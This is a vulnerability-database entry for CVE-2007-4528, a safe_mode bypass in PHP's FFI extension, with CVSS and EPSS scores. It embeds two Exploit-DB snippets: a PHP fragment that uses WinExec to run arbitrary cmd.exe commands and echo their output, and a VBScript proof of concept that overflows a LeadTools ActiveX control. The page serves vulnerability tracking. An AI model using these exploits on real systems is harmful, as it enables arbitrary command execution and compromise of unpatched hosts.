CVE-2007-4528
Published: 2007-08-25
Priority P4 · 27 · medium · 4.3 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 4.70% (90.7th percentile)
The Foreign Function Interface (ffi) extension in PHP 5.0.5 does not follow safe_mode restrictions, which allows context-dependent attackers to execute arbitrary code by loading an arbitrary DLL and calling a function, as demonstrated by kernel32.dll and the WinExec function. NOTE: this issue does not cross privilege boundaries in most contexts, so perhaps it should not be included in CVE.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | — | — |
No detection rules found.
Exploit-DB
PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
exploitdb·2007-08-23
CVE-2007-4528 PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
---
```php
WinExec("cmd.exe /c $command >\"$output\"",0);
while(!file_exists($output))sleep(1);
$con='';
$fp=fopen($output,'r');
while(!feof($fp))$con.=fgets($fp,1024);
fclose($fp);
$con=htmlspecialchars($con);
echo "$con";
unlink($output);
?>
```
# milw0rm.com [2007-08-23]
Exploit-DB
LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)
exploitdb·2007-05-24
CVE-2007-2895 LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)
---
2007/05/24
LeadTools Raster Dialog File Object (LTRDF14e.DLL v. 14.5.0.44) Remote Buffer Overflow Exploit
url: http://www.leadtools.com/
price: eheheh, take a look at their site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
All software that uses this ocx is vulnerable to this exploit.
```vbscript
Sub tryMe
    buff = String(4528, "A")
    get_EDX = "aaaa"
    buff1 = String(4528, "B")
    egg = buff + get_EDX + buff1
    test.Directory = egg
End Sub
```
# milw0rm.com [2007-05-24]
No writeups or analysis indexed.
Published: 2007-08-25